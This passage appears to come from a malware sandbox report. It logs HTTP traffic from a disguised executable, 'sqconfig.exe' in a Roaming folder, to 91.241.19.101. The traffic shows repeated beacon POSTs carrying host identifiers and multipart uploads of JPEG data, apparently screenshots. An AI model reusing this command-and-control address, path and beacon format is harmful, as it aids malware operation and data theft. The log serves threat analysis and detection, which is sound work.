                                                                  Sep 30, 2021 23:54:09.044924021 CEST20598OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:09.045095921 CEST20608OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:09.045177937 CEST20610OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:09.162426949 CEST20613OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:09.162520885 CEST20616OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:09.162646055 CEST20619OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:09.162822008 CEST20631OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:54:09.162842989 CEST20633OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:09.162870884 CEST20636OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:54:09.278265953 CEST20642OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:09.466939926 CEST20685INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  229192.168.2.35006591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:09.296022892 CEST20684OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:09.493458986 CEST20685INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  23192.168.2.34978291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:56.577394962 CEST7901OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:56.770529032 CEST7958INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  230192.168.2.35006691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:09.729649067 CEST20686OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:09.925703049 CEST20700INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  231192.168.2.35006791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:09.836971998 CEST20687OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:09.837548971 CEST20687OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:09.837954998 CEST20697OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:09.838196993 CEST20700OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:09.976418972 CEST20703OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:09.976612091 CEST20706OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:09.976690054 CEST20714OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:09.976773977 CEST20720OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:54:09.976820946 CEST20723OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:09.977375031 CEST20726OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:54:10.116914034 CEST20728OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:10.309629917 CEST20775INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  232192.168.2.35006891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:10.175370932 CEST20774OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:10.353199005 CEST20775INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  233192.168.2.35006991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:10.594280005 CEST20776OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:10.819415092 CEST20815INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  234192.168.2.35007091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:10.663436890 CEST20776OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:10.663850069 CEST20777OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:10.664482117 CEST20787OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:10.664805889 CEST20789OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:10.804792881 CEST20792OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:10.804878950 CEST20800OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:10.805075884 CEST20812OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:54:10.805210114 CEST20815OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:54:10.946953058 CEST20828OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:10.947499990 CEST20834OUTData Raw: a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75 51 21 4e a6 8a 70 a6 26 2d 2d 14 76 a6 48 b4 66 90
                                                                  Data Ascii: %(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcSPh4i(L
                                                                  Sep 30, 2021 23:54:10.947532892 CEST20837OUTData Raw: 45 14 50 03 85 29 a6 8e b4 e3 d2 a8 42 51 45 14 84 14 a2 92 96 98 01 a7 0e 94 dc d2 d3 10 ea 29 0d 14 08 5a 51 d6 90 53 a9 83 0a 51 4d cd 28 34 c4 28 a7 52 0a 5e f4 c4 03 ad 06 8a 29 88 05 38 53 7b d2 d3 01 d4 a2 9a 29 73 8a 64 8b 4d 27 9a 09 a4
                                                                  Data Ascii: EP)BQE)ZQSQM(4(R^)8S{)sdM'1j@Ttbh)ZQb)p5Dv-;(<1Rka1iE%(DNBQE!8JMEe;IIhc4iNv"y-?HalHRB-IDP*%
                                                                  Sep 30, 2021 23:54:11.164259911 CEST20864INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


